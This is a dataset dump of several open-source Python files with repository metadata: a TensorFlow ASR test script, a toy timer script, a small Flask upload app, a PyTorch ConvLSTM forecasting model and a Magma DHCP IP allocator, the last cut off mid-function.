else:
test_dataset = ASRSliceDataset(
data_paths=config["learning_config"]["dataset_config"]["test_paths"],
speech_featurizer=speech_featurizer,
text_featurizer=text_featurizer,
stage="test", shuffle=False
)
# build model
streaming_transducer = StreamingTransducer(
vocabulary_size=text_featurizer.num_classes,
**config["model_config"]
)
streaming_transducer._build(speech_featurizer.shape)
streaming_transducer.load_weights(args.saved, by_name=True)
streaming_transducer.summary(line_length=150)
streaming_transducer.add_featurizers(speech_featurizer, text_featurizer)
streaming_transducer_tester = BaseTester(
config=config["learning_config"]["running_config"],
output_name=args.output_name
)
streaming_transducer_tester.compile(streaming_transducer)
streaming_transducer_tester.run(test_dataset)
| 37.321101 | 95 | 0.753933 |
import os
import argparse
from tensorflow_asr.utils import setup_environment, setup_devices
setup_environment()
import tensorflow as tf
DEFAULT_YAML = os.path.join(os.path.abspath(os.path.dirname(__file__)), "config.yml")
tf.keras.backend.clear_session()
parser = argparse.ArgumentParser(prog="Conformer Testing")
parser.add_argument("--config", type=str, default=DEFAULT_YAML,
help="The file path of model configuration file")
parser.add_argument("--saved", type=str, default=None,
help="Path to saved model")
parser.add_argument("--tfrecords", default=False, action="store_true",
help="Whether to use tfrecords as dataset")
parser.add_argument("--mxp", default=False, action="store_true",
help="Enable mixed precision")
parser.add_argument("--device", type=int, default=0,
help="Device's id to run test on")
parser.add_argument("--cpu", default=False, action="store_true",
help="Whether to only use cpu")
parser.add_argument("--subwords", type=str, default=None,
help="Path to file that stores generated subwords")
parser.add_argument("--output_name", type=str, default="test",
help="Result filename name prefix")
args = parser.parse_args()
tf.config.optimizer.set_experimental_options({"auto_mixed_precision": args.mxp})
setup_devices([args.device], cpu=args.cpu)
from tensorflow_asr.configs.user_config import UserConfig
from tensorflow_asr.datasets.asr_dataset import ASRTFRecordDataset, ASRSliceDataset
from tensorflow_asr.featurizers.speech_featurizers import TFSpeechFeaturizer
from tensorflow_asr.featurizers.text_featurizers import SubwordFeaturizer
from tensorflow_asr.runners.base_runners import BaseTester
from tensorflow_asr.models.streaming_transducer import StreamingTransducer
config = UserConfig(DEFAULT_YAML, args.config, learning=True)
speech_featurizer = TFSpeechFeaturizer(config["speech_config"])
if args.subwords and os.path.exists(args.subwords):
print("Loading subwords ...")
text_featurizer = SubwordFeaturizer.load_from_file(config["decoder_config"], args.subwords)
else:
raise ValueError("subwords must be set")
tf.random.set_seed(0)
assert args.saved
if args.tfrecords:
test_dataset = ASRTFRecordDataset(
data_paths=config["learning_config"]["dataset_config"]["test_paths"],
tfrecords_dir=config["learning_config"]["dataset_config"]["tfrecords_dir"],
speech_featurizer=speech_featurizer,
text_featurizer=text_featurizer,
stage="test", shuffle=False
)
else:
test_dataset = ASRSliceDataset(
data_paths=config["learning_config"]["dataset_config"]["test_paths"],
speech_featurizer=speech_featurizer,
text_featurizer=text_featurizer,
stage="test", shuffle=False
)
# build model
streaming_transducer = StreamingTransducer(
vocabulary_size=text_featurizer.num_classes,
**config["model_config"]
)
streaming_transducer._build(speech_featurizer.shape)
streaming_transducer.load_weights(args.saved, by_name=True)
streaming_transducer.summary(line_length=150)
streaming_transducer.add_featurizers(speech_featurizer, text_featurizer)
streaming_transducer_tester = BaseTester(
config=config["learning_config"]["running_config"],
output_name=args.output_name
)
streaming_transducer_tester.compile(streaming_transducer)
streaming_transducer_tester.run(test_dataset)
| true | true |
1c306167ab64945efeb97233d525330dcef2b1e6 | 851 | py | Python | more.py | salisu14/python-tut | 4defc38924e064657daa46647e8979cde733f9f4 | [
"MIT"
] | 5 | 2021-04-16T01:29:21.000Z | 2021-12-24T10:03:54.000Z | more.py | salisu14/python-tut | 4defc38924e064657daa46647e8979cde733f9f4 | [
"MIT"
] | null | null | null | more.py | salisu14/python-tut | 4defc38924e064657daa46647e8979cde733f9f4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import threading
from datetime import date
from datetime import time
from datetime import datetime
# for i in range(65, 91):
# print(f'{chr(i)} = {i}')
# letters = ['A', 'B', 'C']
# for l in letters:
# print(f'{l} = {ord(l)}')
# alpha = [x for x in range(65, 91)]
# for a in alpha:
# print(f'{a} - {chr(a)}')
def gfg():
print('Welcome to timer')
timer = threading.Timer(10000.0, gfg)
timer.start()
print('.', end='')
print("Cancelling timer\n")
timer.cancel()
print('Exit\n')
try:
date_str = input('Enter birth date (MM/DD/YYYY): ')
birthdate = datetime.strptime(date_str, "%m/%d/%Y")
print("Date of birth:", birthdate)
print(birthdate.strftime("Date of birth details: %a, %d %B %Y"))
except ValueError as ve:
print('Invalid date format, please use %m/%d/%Y date format')
| 17.367347 | 68 | 0.615746 |
import threading
from datetime import date
from datetime import time
from datetime import datetime
def gfg():
print('Welcome to timer')
timer = threading.Timer(10000.0, gfg)
timer.start()
print('.', end='')
print("Cancelling timer\n")
timer.cancel()
print('Exit\n')
try:
date_str = input('Enter birth date (MM/DD/YYYY): ')
birthdate = datetime.strptime(date_str, "%m/%d/%Y")
print("Date of birth:", birthdate)
print(birthdate.strftime("Date of birth details: %a, %d %B %Y"))
except ValueError as ve:
print('Invalid date format, please use %m/%d/%Y date format')
| true | true |
1c3061b7d89899b458899d56cf3afd2c5976e3f7 | 858 | py | Python | flaskapp/app.py | zbouslama/open_maps | 26f0c8e64cf9fe28e24a05fae5c10cb3de38cf54 | [
"MIT"
] | null | null | null | flaskapp/app.py | zbouslama/open_maps | 26f0c8e64cf9fe28e24a05fae5c10cb3de38cf54 | [
"MIT"
] | 3 | 2018-05-07T21:28:40.000Z | 2018-05-07T21:31:23.000Z | flaskapp/app.py | zbouslama/open_maps | 26f0c8e64cf9fe28e24a05fae5c10cb3de38cf54 | [
"MIT"
] | 4 | 2018-04-20T10:14:10.000Z | 2018-05-11T12:59:16.000Z | from flask import Flask, render_template,request, jsonify
from data import Articles
import pandas as pd
app = Flask (__name__)
Articles= Articles()
@app.route('/')
def index():
return render_template ('home.html')
@app.route('/about')
def about ():
return render_template ('about.html')
@app.route('/articles')
def articles ():
return render_template ('articles.html', articles= Articles)
@app.route("/upload", methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
print(request.files['file'])
f = request.files['file']
data_csv = pd.read_csv(f)
return data_csv.to_html(), data_csv.to_csv("./data/data.csv")
return render_template('upload.html')
@app.route("/export", methods=['GET'])
def export_records():
return
if __name__ == '__main__' :
app.run(debug= True)
| 20.428571 | 69 | 0.659674 | from flask import Flask, render_template,request, jsonify
from data import Articles
import pandas as pd
app = Flask (__name__)
Articles= Articles()
@app.route('/')
def index():
return render_template ('home.html')
@app.route('/about')
def about ():
return render_template ('about.html')
@app.route('/articles')
def articles ():
return render_template ('articles.html', articles= Articles)
@app.route("/upload", methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
print(request.files['file'])
f = request.files['file']
data_csv = pd.read_csv(f)
return data_csv.to_html(), data_csv.to_csv("./data/data.csv")
return render_template('upload.html')
@app.route("/export", methods=['GET'])
def export_records():
return
if __name__ == '__main__' :
app.run(debug= True)
| true | true |
1c30629c59327e19ebbf9c332c541f043500aef2 | 8,776 | py | Python | satflow/models/conv_lstm.py | mfrasco/satflow | 2e56b46dfd81a05670c6d2b1bda8c9eec38301a7 | [
"MIT"
] | null | null | null | satflow/models/conv_lstm.py | mfrasco/satflow | 2e56b46dfd81a05670c6d2b1bda8c9eec38301a7 | [
"MIT"
] | null | null | null | satflow/models/conv_lstm.py | mfrasco/satflow | 2e56b46dfd81a05670c6d2b1bda8c9eec38301a7 | [
"MIT"
] | null | null | null | from typing import Any, Dict, Union
import pytorch_lightning as pl
import torch
import torch.nn as nn
import numpy as np
from nowcasting_utils.models.base import register_model
from nowcasting_utils.models.loss import get_loss
from satflow.models.layers.ConvLSTM import ConvLSTMCell
import torchvision
@register_model
class EncoderDecoderConvLSTM(pl.LightningModule):
def __init__(
self,
hidden_dim: int = 64,
input_channels: int = 12,
out_channels: int = 1,
forecast_steps: int = 48,
lr: float = 0.001,
visualize: bool = False,
loss: Union[str, torch.nn.Module] = "mse",
pretrained: bool = False,
conv_type: str = "standard",
):
super(EncoderDecoderConvLSTM, self).__init__()
self.forecast_steps = forecast_steps
self.criterion = get_loss(loss)
self.lr = lr
self.visualize = visualize
self.model = ConvLSTM(input_channels, hidden_dim, out_channels, conv_type=conv_type)
self.save_hyperparameters()
@classmethod
def from_config(cls, config):
return EncoderDecoderConvLSTM(
hidden_dim=config.get("num_hidden", 64),
input_channels=config.get("in_channels", 12),
out_channels=config.get("out_channels", 1),
forecast_steps=config.get("forecast_steps", 1),
lr=config.get("lr", 0.001),
)
def forward(self, x, future_seq=0, hidden_state=None):
return self.model.forward(x, future_seq, hidden_state)
def configure_optimizers(self):
# DeepSpeedCPUAdam provides 5x to 7x speedup over torch.optim.adam(w)
# optimizer = torch.optim.adam()
return torch.optim.Adam(self.parameters(), lr=self.lr)
def training_step(self, batch, batch_idx):
x, y = batch
y_hat = self(x, self.forecast_steps)
y_hat = torch.permute(y_hat, dims=(0, 2, 1, 3, 4))
# Generally only care about the center x crop, so the model can take into account the clouds in the area without
# being penalized for that, but for now, just do general MSE loss, also only care about first 12 channels
# the logger you used (in this case tensorboard)
# if self.visualize:
# if np.random.random() < 0.01:
# self.visualize_step(x, y, y_hat, batch_idx)
loss = self.criterion(y_hat, y)
self.log("train/loss", loss, on_step=True)
frame_loss_dict = {}
for f in range(self.forecast_steps):
frame_loss = self.criterion(y_hat[:, f, :, :, :], y[:, f, :, :, :]).item()
frame_loss_dict[f"train/frame_{f}_loss"] = frame_loss
self.log_dict(frame_loss_dict, on_step=False, on_epoch=True)
return loss
def validation_step(self, batch, batch_idx):
x, y = batch
y_hat = self(x, self.forecast_steps)
y_hat = torch.permute(y_hat, dims=(0, 2, 1, 3, 4))
val_loss = self.criterion(y_hat, y)
# Save out loss per frame as well
frame_loss_dict = {}
# y_hat = torch.moveaxis(y_hat, 2, 1)
for f in range(self.forecast_steps):
frame_loss = self.criterion(y_hat[:, f, :, :, :], y[:, f, :, :, :]).item()
frame_loss_dict[f"val/frame_{f}_loss"] = frame_loss
self.log("val/loss", val_loss, on_step=True, on_epoch=True)
self.log_dict(frame_loss_dict, on_step=False, on_epoch=True)
return val_loss
def test_step(self, batch, batch_idx):
x, y = batch
y_hat = self(x, self.forecast_steps)
loss = self.criterion(y_hat, y)
return loss
def visualize_step(self, x, y, y_hat, batch_idx, step="train"):
tensorboard = self.logger.experiment[0]
# Add all the different timesteps for a single prediction, 0.1% of the time
if len(x.shape) == 5:
# Timesteps per channel
images = x[0].cpu().detach()
for i, t in enumerate(images): # Now would be (C, H, W)
t = [torch.unsqueeze(img, dim=0) for img in t]
image_grid = torchvision.utils.make_grid(t, nrow=self.input_channels)
tensorboard.add_image(
f"{step}/Input_Image_Stack_Frame_{i}", image_grid, global_step=batch_idx
)
images = y[0].cpu().detach()
for i, t in enumerate(images): # Now would be (C, H, W)
t = [torch.unsqueeze(img, dim=0) for img in t]
image_grid = torchvision.utils.make_grid(t, nrow=self.output_channels)
tensorboard.add_image(
f"{step}/Target_Image_Stack_Frame_{i}", image_grid, global_step=batch_idx
)
images = y_hat[0].cpu().detach()
for i, t in enumerate(images): # Now would be (C, H, W)
t = [torch.unsqueeze(img, dim=0) for img in t]
image_grid = torchvision.utils.make_grid(t, nrow=self.output_channels)
tensorboard.add_image(
f"{step}/Generated_Stack_Frame_{i}", image_grid, global_step=batch_idx
)
class ConvLSTM(torch.nn.Module):
def __init__(self, input_channels, hidden_dim, out_channels, conv_type: str = "standard"):
super().__init__()
""" ARCHITECTURE
# Encoder (ConvLSTM)
# Encoder Vector (final hidden state of encoder)
# Decoder (ConvLSTM) - takes Encoder Vector as input
# Decoder (3D CNN) - produces regression predictions for our model
"""
self.encoder_1_convlstm = ConvLSTMCell(
input_dim=input_channels,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True,
conv_type=conv_type,
)
self.encoder_2_convlstm = ConvLSTMCell(
input_dim=hidden_dim,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True,
conv_type=conv_type,
)
self.decoder_1_convlstm = ConvLSTMCell(
input_dim=hidden_dim,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True, # nf + 1
conv_type=conv_type,
)
self.decoder_2_convlstm = ConvLSTMCell(
input_dim=hidden_dim,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True,
conv_type=conv_type,
)
self.decoder_CNN = nn.Conv3d(
in_channels=hidden_dim,
out_channels=out_channels,
kernel_size=(1, 3, 3),
padding=(0, 1, 1),
)
def autoencoder(self, x, seq_len, future_step, h_t, c_t, h_t2, c_t2, h_t3, c_t3, h_t4, c_t4):
outputs = []
# encoder
for t in range(seq_len):
h_t, c_t = self.encoder_1_convlstm(
input_tensor=x[:, t, :, :], cur_state=[h_t, c_t]
) # we could concat to provide skip conn here
h_t2, c_t2 = self.encoder_2_convlstm(
input_tensor=h_t, cur_state=[h_t2, c_t2]
) # we could concat to provide skip conn here
# encoder_vector
encoder_vector = h_t2
# decoder
for t in range(future_step):
h_t3, c_t3 = self.decoder_1_convlstm(
input_tensor=encoder_vector, cur_state=[h_t3, c_t3]
) # we could concat to provide skip conn here
h_t4, c_t4 = self.decoder_2_convlstm(
input_tensor=h_t3, cur_state=[h_t4, c_t4]
) # we could concat to provide skip conn here
encoder_vector = h_t4
outputs += [h_t4] # predictions
outputs = torch.stack(outputs, 1)
outputs = outputs.permute(0, 2, 1, 3, 4)
outputs = self.decoder_CNN(outputs)
outputs = torch.nn.Sigmoid()(outputs)
return outputs
def forward(self, x, forecast_steps=0, hidden_state=None):
"""
Parameters
----------
input_tensor:
5-D Tensor of shape (b, t, c, h, w) # batch, time, channel, height, width
"""
# find size of different input dimensions
b, seq_len, _, h, w = x.size()
# initialize hidden states
h_t, c_t = self.encoder_1_convlstm.init_hidden(batch_size=b, image_size=(h, w))
h_t2, c_t2 = self.encoder_2_convlstm.init_hidden(batch_size=b, image_size=(h, w))
h_t3, c_t3 = self.decoder_1_convlstm.init_hidden(batch_size=b, image_size=(h, w))
h_t4, c_t4 = self.decoder_2_convlstm.init_hidden(batch_size=b, image_size=(h, w))
# autoencoder forward
outputs = self.autoencoder(
x, seq_len, forecast_steps, h_t, c_t, h_t2, c_t2, h_t3, c_t3, h_t4, c_t4
)
return outputs
| 37.991342 | 120 | 0.592183 | from typing import Any, Dict, Union
import pytorch_lightning as pl
import torch
import torch.nn as nn
import numpy as np
from nowcasting_utils.models.base import register_model
from nowcasting_utils.models.loss import get_loss
from satflow.models.layers.ConvLSTM import ConvLSTMCell
import torchvision
@register_model
class EncoderDecoderConvLSTM(pl.LightningModule):
def __init__(
self,
hidden_dim: int = 64,
input_channels: int = 12,
out_channels: int = 1,
forecast_steps: int = 48,
lr: float = 0.001,
visualize: bool = False,
loss: Union[str, torch.nn.Module] = "mse",
pretrained: bool = False,
conv_type: str = "standard",
):
super(EncoderDecoderConvLSTM, self).__init__()
self.forecast_steps = forecast_steps
self.criterion = get_loss(loss)
self.lr = lr
self.visualize = visualize
self.model = ConvLSTM(input_channels, hidden_dim, out_channels, conv_type=conv_type)
self.save_hyperparameters()
@classmethod
def from_config(cls, config):
return EncoderDecoderConvLSTM(
hidden_dim=config.get("num_hidden", 64),
input_channels=config.get("in_channels", 12),
out_channels=config.get("out_channels", 1),
forecast_steps=config.get("forecast_steps", 1),
lr=config.get("lr", 0.001),
)
def forward(self, x, future_seq=0, hidden_state=None):
return self.model.forward(x, future_seq, hidden_state)
def configure_optimizers(self):
return torch.optim.Adam(self.parameters(), lr=self.lr)
def training_step(self, batch, batch_idx):
x, y = batch
y_hat = self(x, self.forecast_steps)
y_hat = torch.permute(y_hat, dims=(0, 2, 1, 3, 4))
loss = self.criterion(y_hat, y)
self.log("train/loss", loss, on_step=True)
frame_loss_dict = {}
for f in range(self.forecast_steps):
frame_loss = self.criterion(y_hat[:, f, :, :, :], y[:, f, :, :, :]).item()
frame_loss_dict[f"train/frame_{f}_loss"] = frame_loss
self.log_dict(frame_loss_dict, on_step=False, on_epoch=True)
return loss
def validation_step(self, batch, batch_idx):
x, y = batch
y_hat = self(x, self.forecast_steps)
y_hat = torch.permute(y_hat, dims=(0, 2, 1, 3, 4))
val_loss = self.criterion(y_hat, y)
frame_loss_dict = {}
for f in range(self.forecast_steps):
frame_loss = self.criterion(y_hat[:, f, :, :, :], y[:, f, :, :, :]).item()
frame_loss_dict[f"val/frame_{f}_loss"] = frame_loss
self.log("val/loss", val_loss, on_step=True, on_epoch=True)
self.log_dict(frame_loss_dict, on_step=False, on_epoch=True)
return val_loss
def test_step(self, batch, batch_idx):
x, y = batch
y_hat = self(x, self.forecast_steps)
loss = self.criterion(y_hat, y)
return loss
def visualize_step(self, x, y, y_hat, batch_idx, step="train"):
tensorboard = self.logger.experiment[0]
if len(x.shape) == 5:
images = x[0].cpu().detach()
for i, t in enumerate(images):
t = [torch.unsqueeze(img, dim=0) for img in t]
image_grid = torchvision.utils.make_grid(t, nrow=self.input_channels)
tensorboard.add_image(
f"{step}/Input_Image_Stack_Frame_{i}", image_grid, global_step=batch_idx
)
images = y[0].cpu().detach()
for i, t in enumerate(images):
t = [torch.unsqueeze(img, dim=0) for img in t]
image_grid = torchvision.utils.make_grid(t, nrow=self.output_channels)
tensorboard.add_image(
f"{step}/Target_Image_Stack_Frame_{i}", image_grid, global_step=batch_idx
)
images = y_hat[0].cpu().detach()
for i, t in enumerate(images):
t = [torch.unsqueeze(img, dim=0) for img in t]
image_grid = torchvision.utils.make_grid(t, nrow=self.output_channels)
tensorboard.add_image(
f"{step}/Generated_Stack_Frame_{i}", image_grid, global_step=batch_idx
)
class ConvLSTM(torch.nn.Module):
def __init__(self, input_channels, hidden_dim, out_channels, conv_type: str = "standard"):
super().__init__()
self.encoder_1_convlstm = ConvLSTMCell(
input_dim=input_channels,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True,
conv_type=conv_type,
)
self.encoder_2_convlstm = ConvLSTMCell(
input_dim=hidden_dim,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True,
conv_type=conv_type,
)
self.decoder_1_convlstm = ConvLSTMCell(
input_dim=hidden_dim,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True,
conv_type=conv_type,
)
self.decoder_2_convlstm = ConvLSTMCell(
input_dim=hidden_dim,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True,
conv_type=conv_type,
)
self.decoder_CNN = nn.Conv3d(
in_channels=hidden_dim,
out_channels=out_channels,
kernel_size=(1, 3, 3),
padding=(0, 1, 1),
)
def autoencoder(self, x, seq_len, future_step, h_t, c_t, h_t2, c_t2, h_t3, c_t3, h_t4, c_t4):
outputs = []
for t in range(seq_len):
h_t, c_t = self.encoder_1_convlstm(
input_tensor=x[:, t, :, :], cur_state=[h_t, c_t]
)
h_t2, c_t2 = self.encoder_2_convlstm(
input_tensor=h_t, cur_state=[h_t2, c_t2]
)
encoder_vector = h_t2
for t in range(future_step):
h_t3, c_t3 = self.decoder_1_convlstm(
input_tensor=encoder_vector, cur_state=[h_t3, c_t3]
)
h_t4, c_t4 = self.decoder_2_convlstm(
input_tensor=h_t3, cur_state=[h_t4, c_t4]
)
encoder_vector = h_t4
outputs += [h_t4]
outputs = torch.stack(outputs, 1)
outputs = outputs.permute(0, 2, 1, 3, 4)
outputs = self.decoder_CNN(outputs)
outputs = torch.nn.Sigmoid()(outputs)
return outputs
def forward(self, x, forecast_steps=0, hidden_state=None):
b, seq_len, _, h, w = x.size()
h_t, c_t = self.encoder_1_convlstm.init_hidden(batch_size=b, image_size=(h, w))
h_t2, c_t2 = self.encoder_2_convlstm.init_hidden(batch_size=b, image_size=(h, w))
h_t3, c_t3 = self.decoder_1_convlstm.init_hidden(batch_size=b, image_size=(h, w))
h_t4, c_t4 = self.decoder_2_convlstm.init_hidden(batch_size=b, image_size=(h, w))
outputs = self.autoencoder(
x, seq_len, forecast_steps, h_t, c_t, h_t2, c_t2, h_t3, c_t3, h_t4, c_t4
)
return outputs
| true | true |
1c3062baff364bcff6794e9cf5af2e1815c2aa40 | 7,095 | py | Python | lte/gateway/python/magma/mobilityd/ip_allocator_dhcp.py | Milind-Blaze/magma | b54257e997ad55781752e644e62efe9a7cca4501 | [
"BSD-3-Clause"
] | null | null | null | lte/gateway/python/magma/mobilityd/ip_allocator_dhcp.py | Milind-Blaze/magma | b54257e997ad55781752e644e62efe9a7cca4501 | [
"BSD-3-Clause"
] | null | null | null | lte/gateway/python/magma/mobilityd/ip_allocator_dhcp.py | Milind-Blaze/magma | b54257e997ad55781752e644e62efe9a7cca4501 | [
"BSD-3-Clause"
] | null | null | null | """
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Allocates IP address as per DHCP server in the uplink network.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import logging
from copy import deepcopy
from ipaddress import ip_address, ip_network
from threading import Condition
from typing import List
from magma.mobilityd.ip_descriptor import IPDesc, IPState, IPType
from .dhcp_client import DHCPClient
from .dhcp_desc import DHCPDescriptor, DHCPState
from .ip_allocator_base import IPAllocator, NoAvailableIPError
from .mac import MacAddress, create_mac_from_sid
from .mobility_store import MobilityStore
from .utils import IPAddress, IPNetwork
DEFAULT_DHCP_REQUEST_RETRY_FREQUENCY = 10
DEFAULT_DHCP_REQUEST_RETRY_DELAY = 1
LOG = logging.getLogger('mobilityd.dhcp.alloc')
class IPAllocatorDHCP(IPAllocator):
def __init__(
self, store: MobilityStore, retry_limit: int = 300,
iface: str = "dhcp0",
):
"""
Allocate IP address for SID using DHCP server.
SID is mapped to MAC address using function defined in mac.py
then this mac address used in DHCP request to allocate new IP
from DHCP server.
This IP is also cached to improve performance in case of
reallocation for same SID in short period of time.
Args:
store: Moblityd storage instance
retry_limit: try DHCP request
iface: DHCP interface.
"""
self._store = store
self.dhcp_wait = Condition()
self._dhcp_client = DHCPClient(
dhcp_wait=self.dhcp_wait,
dhcp_store=store.dhcp_store,
gw_info=store.dhcp_gw_info,
iface=iface,
)
self._retry_limit = retry_limit # default wait for two minutes
self._dhcp_client.run()
def add_ip_block(self, ipblock: IPNetwork):
logging.warning(
"No need to allocate block for DHCP allocator: %s",
ipblock,
)
def remove_ip_blocks(
self,
ipblocks: List[IPNetwork],
force: bool = False,
) -> List[IPNetwork]:
logging.warning(
"Trying to delete ipblock from DHCP allocator: %s",
ipblocks,
)
return []
def list_added_ip_blocks(self) -> List[IPNetwork]:
return list(deepcopy(self._store.assigned_ip_blocks))
def list_allocated_ips(self, ipblock: IPNetwork) -> List[IPAddress]:
""" List IP addresses allocated from a given IP block
Args:
ipblock (ipaddress.ip_network): ip network to add
e.g. ipaddress.ip_network("10.0.0.0/24")
Return:
list of IP addresses (ipaddress.ip_address)
"""
return [
ip for ip in
self._store.ip_state_map.list_ips(IPState.ALLOCATED)
if ip in ipblock
]
def alloc_ip_address(self, sid: str, vlan_id: int) -> IPDesc:
"""
Assumption: one-to-one mappings between SID and IP.
Args:
sid (string): universal subscriber id
vlan_id: vlan of the APN
Returns:
ipaddress.ip_address: IP address allocated
Raises:
NoAvailableIPError: if run out of available IP addresses
"""
mac = create_mac_from_sid(sid)
dhcp_desc = self._dhcp_client.get_dhcp_desc(mac, str(vlan_id))
LOG.debug(
"allocate IP for %s mac %s dhcp_desc %s", sid, mac,
dhcp_desc,
)
if dhcp_allocated_ip(dhcp_desc) is not True:
dhcp_desc = self._alloc_ip_address_from_dhcp(mac, vlan_id)
if dhcp_allocated_ip(dhcp_desc):
ip_block = ip_network(dhcp_desc.subnet)
ip_desc = IPDesc(
ip=ip_address(dhcp_desc.ip),
state=IPState.ALLOCATED,
sid=sid,
ip_block=ip_block,
ip_type=IPType.DHCP,
vlan_id=vlan_id,
)
self._store.assigned_ip_blocks.add(ip_block)
return ip_desc
else:
msg = "No available IP addresses From DHCP for SID: {} MAC {}".format(
sid, mac,
)
raise NoAvailableIPError(msg)
def release_ip(self, ip_desc: IPDesc):
"""
Release IP address, this involves following steps.
1. send DHCP protocol packet to release the IP.
2. update IP block list.
3. update IP from ip-state.
Args:
ip_desc: release needs following info from IPDesc.
SID used to get mac address, IP assigned to this SID,
IP block of the IP address, vlan id of the APN.
Returns: None
"""
self._dhcp_client.release_ip_address(
create_mac_from_sid(ip_desc.sid),
ip_desc.vlan_id,
)
# Remove the IP from free IP list, since DHCP is the
# owner of this IP
self._store.ip_state_map.remove_ip_from_state(ip_desc.ip, IPState.FREE)
list_allocated_ips = self._store.ip_state_map.list_ips(
IPState.ALLOCATED,
)
for ipaddr in list_allocated_ips:
if ipaddr in ip_desc.ip_block:
# found the IP, do not remove this ip_block
return
ip_block_network = ip_network(ip_desc.ip_block)
if ip_block_network in self._store.assigned_ip_blocks:
self._store.assigned_ip_blocks.remove(ip_block_network)
logging.debug(
"del: _assigned_ip_blocks %s ipblock %s",
self._store.assigned_ip_blocks, ip_desc.ip_block,
)
def stop_dhcp_sniffer(self):
self._dhcp_client.stop()
def _alloc_ip_address_from_dhcp(
self, mac: MacAddress,
vlan: int,
) -> DHCPDescriptor:
retry_count = 0
with self.dhcp_wait:
dhcp_desc = None
while (
retry_count < self._retry_limit
and dhcp_allocated_ip(dhcp_desc) is not True
):
if retry_count % DEFAULT_DHCP_REQUEST_RETRY_FREQUENCY == 0:
self._dhcp_client.send_dhcp_packet(
mac, vlan,
DHCPState.DISCOVER,
)
self.dhcp_wait.wait(timeout=DEFAULT_DHCP_REQUEST_RETRY_DELAY)
dhcp_desc = self._dhcp_client.get_dhcp_desc(mac, vlan)
retry_count = retry_count + 1
return dhcp_desc
def dhcp_allocated_ip(dhcp_desc) -> bool:
return dhcp_desc is not None and dhcp_desc.ip_is_allocated()
| 31.959459 | 82 | 0.622974 |
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import logging
from copy import deepcopy
from ipaddress import ip_address, ip_network
from threading import Condition
from typing import List
from magma.mobilityd.ip_descriptor import IPDesc, IPState, IPType
from .dhcp_client import DHCPClient
from .dhcp_desc import DHCPDescriptor, DHCPState
from .ip_allocator_base import IPAllocator, NoAvailableIPError
from .mac import MacAddress, create_mac_from_sid
from .mobility_store import MobilityStore
from .utils import IPAddress, IPNetwork
DEFAULT_DHCP_REQUEST_RETRY_FREQUENCY = 10
DEFAULT_DHCP_REQUEST_RETRY_DELAY = 1
LOG = logging.getLogger('mobilityd.dhcp.alloc')
class IPAllocatorDHCP(IPAllocator):
def __init__(
self, store: MobilityStore, retry_limit: int = 300,
iface: str = "dhcp0",
):
self._store = store
self.dhcp_wait = Condition()
self._dhcp_client = DHCPClient(
dhcp_wait=self.dhcp_wait,
dhcp_store=store.dhcp_store,
gw_info=store.dhcp_gw_info,
iface=iface,
)
self._retry_limit = retry_limit
self._dhcp_client.run()
def add_ip_block(self, ipblock: IPNetwork):
logging.warning(
"No need to allocate block for DHCP allocator: %s",
ipblock,
)
def remove_ip_blocks(
self,
ipblocks: List[IPNetwork],
force: bool = False,
) -> List[IPNetwork]:
logging.warning(
"Trying to delete ipblock from DHCP allocator: %s",
ipblocks,
)
return []
def list_added_ip_blocks(self) -> List[IPNetwork]:
return list(deepcopy(self._store.assigned_ip_blocks))
def list_allocated_ips(self, ipblock: IPNetwork) -> List[IPAddress]:
return [
ip for ip in
self._store.ip_state_map.list_ips(IPState.ALLOCATED)
if ip in ipblock
]
def alloc_ip_address(self, sid: str, vlan_id: int) -> IPDesc:
mac = create_mac_from_sid(sid)
dhcp_desc = self._dhcp_client.get_dhcp_desc(mac, str(vlan_id))
LOG.debug(
"allocate IP for %s mac %s dhcp_desc %s", sid, mac,
dhcp_desc,
)
if dhcp_allocated_ip(dhcp_desc) is not True:
dhcp_desc = self._alloc_ip_address_from_dhcp(mac, vlan_id)
if dhcp_allocated_ip(dhcp_desc):
ip_block = ip_network(dhcp_desc.subnet)
ip_desc = IPDesc(
ip=ip_address(dhcp_desc.ip),
state=IPState.ALLOCATED,
sid=sid,
ip_block=ip_block,
ip_type=IPType.DHCP,
vlan_id=vlan_id,
)
self._store.assigned_ip_blocks.add(ip_block)
return ip_desc
else:
msg = "No available IP addresses From DHCP for SID: {} MAC {}".format(
sid, mac,
)
raise NoAvailableIPError(msg)
def release_ip(self, ip_desc: IPDesc):
self._dhcp_client.release_ip_address(
create_mac_from_sid(ip_desc.sid),
ip_desc.vlan_id,
)
self._store.ip_state_map.remove_ip_from_state(ip_desc.ip, IPState.FREE)
list_allocated_ips = self._store.ip_state_map.list_ips(
IPState.ALLOCATED,
)
for ipaddr in list_allocated_ips:
if ipaddr in ip_desc.ip_block:
return
ip_block_network = ip_network(ip_desc.ip_block)
if ip_block_network in self._store.assigned_ip_blocks:
self._store.assigned_ip_blocks.remove(ip_block_network)
logging.debug(
"del: _assigned_ip_blocks %s ipblock %s",
self._store.assigned_ip_blocks, ip_desc.ip_block,
)
def stop_dhcp_sniffer(self):
self._dhcp_client.stop()
def _alloc_ip_address_from_dhcp(
self, mac: MacAddress,
vlan: int,
) -> DHCPDescriptor:
retry_count = 0
with self.dhcp_wait:
dhcp_desc = None
while (
retry_count < self._retry_limit
and dhcp_allocated_ip(dhcp_desc) is not True
):
if retry_count % DEFAULT_DHCP_REQUEST_RETRY_FREQUENCY == 0:
self._dhcp_client.send_dhcp_packet(
mac, vlan,
DHCPState.DISCOVER,
)
self.dhcp_wait.wait(timeout=DEFAULT_DHCP_REQUEST_RETRY_DELAY)
